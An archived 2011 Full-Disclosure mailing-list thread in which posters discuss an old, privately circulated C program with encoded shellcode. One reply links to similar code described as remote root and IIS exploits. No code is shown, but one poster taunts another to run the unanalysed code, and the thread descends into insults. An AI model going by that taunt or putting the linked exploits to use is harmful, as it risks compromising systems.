 http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire
 thread, code is mentioned though)

 I'm sure there's more, but this kinda reminds me of that leaked private
 exploit on pastebin a few weeks back (you know, the one that was nice
 enough to create a _local_ root account), and insisted that it was private
 private private and specifically said NOT to leak it.

 I am curious as to how you're so certain that it's on many many boxes yet
 know next to nothing about it.

 On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 sec...@gmail.com wrote:

 Hello List,
 Id like people to also, like this thread asks, to pls give some opinion,
 other than mine.. wich, i am yet to make;

 http://www.hackerthreads.org/Topic-5973

 Please look at this .c code on here, if you wish, and tell me, why
 A. It is still in circulation, seeminlgly, on MANY MANY boxes
 B. people still seem to try keep it private :s

 This morning, a friend from webhostingtalk.com ,asked me to take a look.
 I have and, i can only sofar say, once i decrypt the shellcode, ill  know
 abit more..
 altho , i rmember this thing, and, somany people were after it, people
 were paying for it, this is first time i have seen it actually disclosed
 tho,
 admittedly only looked today.
 If skiddies are using it to ddos things, I want to makesure i can expose
 it, and kill the threats.
 thankyou.
 xd .// exposing bullshit as i ride!


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread xD 0x41 
h the idiot who thinks im laurelai... meh , your a fool yourself just for
even thinking that much :s
your but an echo on the list, wich, does not echo the rest of it, wich is a
good place to be.
unfortunately, your one of the few who should just be blocked, for making
absolutely nothing but abusive crap...
your an idiot. not me.
i dont run things, why, have you ran it ?
Is it good ?
hehe... maybe it is!
i guess if hes using it...well...
*sic*



On 26 October 2011 13:21, Antony widmal antony.wid...@gmail.com wrote:

 Do yourself a favor and run that code dumbass.


 On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 sec...@gmail.com wrote:

 I use darknets to help me,
 they send me the info i need.
 simple answer to simple question.
 look them up, they may oneday protect you, also.


 On 26 October 2011 13:15, adam a...@papsy.net wrote:

 http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code,
 claims to be a remote kernel root exploit)
 http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very
 similar code, claims to be an IIS exploit)
 http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire
 thread, code is mentioned though)

 I'm sure there's more, but this kinda reminds me of that leaked private
 exploit on pastebin a few weeks back (you know, the one that was nice
 enough to create a _local_ root account), and insisted that it was private
 private private and specifically said NOT to leak it.

 I am curious as to how you're so certain that it's on many many boxes
 yet know next to nothing about it.

 On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 sec...@gmail.com wrote:

 Hello List,
 Id like people to also, like this thread asks, to pls give some opinion,
 other than mine.. wich, i am yet to make;

 http://www.hackerthreads.org/Topic-5973

 Please look at this .c code on here, if you wish, and tell me, why
 A. It is still in circulation, seeminlgly, on MANY MANY boxes
 B. people still seem to try keep it private :s

 This morning, a friend from webhostingtalk.com ,asked me to take a
 look.
 I have and, i can only sofar say, once i decrypt the shellcode, ill
 know abit more..
 altho , i rmember this thing, and, somany people were after it, people
 were paying for it, this is first time i have seen it actually disclosed
 tho,
 admittedly only looked today.
 If skiddies are using it to ddos things, I want to makesure i can expose
 it, and kill the threats.
 thankyou.
 xd .// exposing bullshit as i ride!


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread Antony widmal 
Do yourself a favor and run that code dumbass.


On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 sec...@gmail.com wrote:

 I use darknets to help me,
 they send me the info i need.
 simple answer to simple question.
 look them up, they may oneday protect you, also.


 On 26 October 2011 13:15, adam a...@papsy.net wrote:

 http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code,
 claims to be a remote kernel root exploit)
 http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very
 similar code, claims to be an IIS exploit)
 http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire
 thread, code is mentioned though)

 I'm sure there's more, but this kinda reminds me of that leaked private
 exploit on pastebin a few weeks back (you know, the one that was nice
 enough to create a _local_ root account), and insisted that it was private
 private private and specifically said NOT to leak it.

 I am curious as to how you're so certain that it's on many many boxes
 yet know next to nothing about it.

 On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 sec...@gmail.com wrote:

 Hello List,
 Id like people to also, like this thread asks, to pls give some opinion,
 other than mine.. wich, i am yet to make;

 http://www.hackerthreads.org/Topic-5973

 Please look at this .c code on here, if you wish, and tell me, why
 A. It is still in circulation, seeminlgly, on MANY MANY boxes
 B. people still seem to try keep it private :s

 This morning, a friend from webhostingtalk.com ,asked me to take a look.
 I have and, i can only sofar say, once i decrypt the shellcode, ill  know
 abit more..
 altho , i rmember this thing, and, somany people were after it, people
 were paying for it, this is first time i have seen it actually disclosed
 tho,
 admittedly only looked today.
 If skiddies are using it to ddos things, I want to makesure i can expose
 it, and kill the threats.
 thankyou.
 xd .// exposing bullshit as i ride!


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread xD 0x41 
My apolgies.
I have a grammar problem,Its in part me not changing my old kb,and then
also, im in an office sometimes and have to be quick :
You do have a good point tho, I will try better.
xd


On 26 October 2011 13:29, Julian DeMarchi jul...@jdcomputers.com.au wrote:

 On 10/26/2011 12:24 PM, xD 0x41 wrote:
  Ok... i see now, it is being disguised, from along time ago...
  strange why it is being used, unless people have started to rename things
  maybe... to suit old things, wich dont work :s
  it is possible...
  I will see what it is doing and done sofar in the darknet i have setup in
 a
  sec and, that will be it.
  ok.. cheers.

 You're very knowledgeable thus I like reading what you have to post. Can
 I please ask you to concentrate on your grammar and the layout of your
 emails? They are hard to follow and I feel I am missing important parts
 in your emails due to this...

 --julian

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread Antony widmal 
Using your smartphone while flipping burger can be dangerous pandawan.

More over if you work at burger king.



On Tue, Oct 25, 2011 at 10:26 PM, xD 0x41 sec...@gmail.com wrote:

 h the idiot who thinks im laurelai... meh , your a fool yourself just for
 even thinking that much :s
 your but an echo on the list, wich, does not echo the rest of it, wich is a
 good place to be.
 unfortunately, your one of the few who should just be blocked, for making
 absolutely nothing but abusive crap...
 your an idiot. not me.
 i dont run things, why, have you ran it ?
 Is it good ?
 hehe... maybe it is!
 i guess if hes using it...well...
 *sic*




 On 26 October 2011 13:21, Antony widmal antony.wid...@gmail.com wrote:

 Do yourself a favor and run that code dumbass.


 On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 sec...@gmail.com wrote:

 I use darknets to help me,
 they send me the info i need.
 simple answer to simple question.
 look them up, they may oneday protect you, also.


 On 26 October 2011 13:15, adam a...@papsy.net wrote:

 http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code,
 claims to be a remote kernel root exploit)
 http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very
 similar code, claims to be an IIS exploit)
 http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire
 thread, code is mentioned though)

 I'm sure there's more, but this kinda reminds me of that leaked private
 exploit on pastebin a few weeks back (you know, the one that was nice
 enough to create a _local_ root account), and insisted that it was private
 private private and specifically said NOT to leak it.

 I am curious as to how you're so certain that it's on many many boxes
 yet know next to nothing about it.

 On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 sec...@gmail.com wrote:

 Hello List,
 Id like people to also, like this thread asks, to pls give some
 opinion, other than mine.. wich, i am yet to make;

 http://www.hackerthreads.org/Topic-5973

 Please look at this .c code on here, if you wish, and tell me, why
 A. It is still in circulation, seeminlgly, on MANY MANY boxes
 B. people still seem to try keep it private :s

 This morning, a friend from webhostingtalk.com ,asked me to take a
 look.
 I have and, i can only sofar say, once i decrypt the shellcode, ill
 know abit more..
 altho , i rmember this thing, and, somany people were after it, people
 were paying for it, this is first time i have seen it actually disclosed
 tho,
 admittedly only looked today.
 If skiddies are using it to ddos things, I want to makesure i can
 expose it, and kill the threats.
 thankyou.
 xd .// exposing bullshit as i ride!


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread xD 0x41 
yer ofc... anyhow, ignoring you now...

you obv think your some leet troll, your not, your ONLY a TROLL :)
have a nice day or is that

*Goplamamamama Ignananayu*

forget the jedi oky, you gotta brushup on ya troll trash talk!
bah hahaha.
fool
xd


On 26 October 2011 13:44, Antony widmal antony.wid...@gmail.com wrote:

 Using your smartphone while flipping burger can be dangerous pandawan.

 More over if you work at burger king.



 On Tue, Oct 25, 2011 at 10:26 PM, xD 0x41 sec...@gmail.com wrote:

 h the idiot who thinks im laurelai... meh , your a fool yourself just for
 even thinking that much :s
 your but an echo on the list, wich, does not echo the rest of it, wich is
 a good place to be.
 unfortunately, your one of the few who should just be blocked, for making
 absolutely nothing but abusive crap...
 your an idiot. not me.
 i dont run things, why, have you ran it ?
 Is it good ?
 hehe... maybe it is!
 i guess if hes using it...well...
 *sic*




 On 26 October 2011 13:21, Antony widmal antony.wid...@gmail.com wrote:

 Do yourself a favor and run that code dumbass.


 On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 sec...@gmail.com wrote:

 I use darknets to help me,
 they send me the info i need.
 simple answer to simple question.
 look them up, they may oneday protect you, also.


 On 26 October 2011 13:15, adam a...@papsy.net wrote:

 http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code,
 claims to be a remote kernel root exploit)
 http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very
 similar code, claims to be an IIS exploit)
 http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire
 thread, code is mentioned though)

 I'm sure there's more, but this kinda reminds me of that leaked
 private exploit on pastebin a few weeks back (you know, the one that was
 nice enough to create a _local_ root account), and insisted that it was
 private private private and specifically said NOT to leak it.

 I am curious as to how you're so certain that it's on many many boxes
 yet know next to nothing about it.

 On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 sec...@gmail.com wrote:

 Hello List,
 Id like people to also, like this thread asks, to pls give some
 opinion, other than mine.. wich, i am yet to make;

 http://www.hackerthreads.org/Topic-5973

 Please look at this .c code on here, if you wish, and tell me, why
 A. It is still in circulation, seeminlgly, on MANY MANY boxes
 B. people still seem to try keep it private :s

 This morning, a friend from webhostingtalk.com ,asked me to take a
 look.
 I have and, i can only sofar say, once i decrypt the shellcode, ill
 know abit more..
 altho , i rmember this thing, and, somany people were after it, people
 were paying for it, this is first time i have seen it actually disclosed
 tho,
 admittedly only looked today.
 If skiddies are using it to ddos things, I want to makesure i can
 expose it, and kill the threats.
 thankyou.
 xd .// exposing bullshit as i ride!


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/





___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/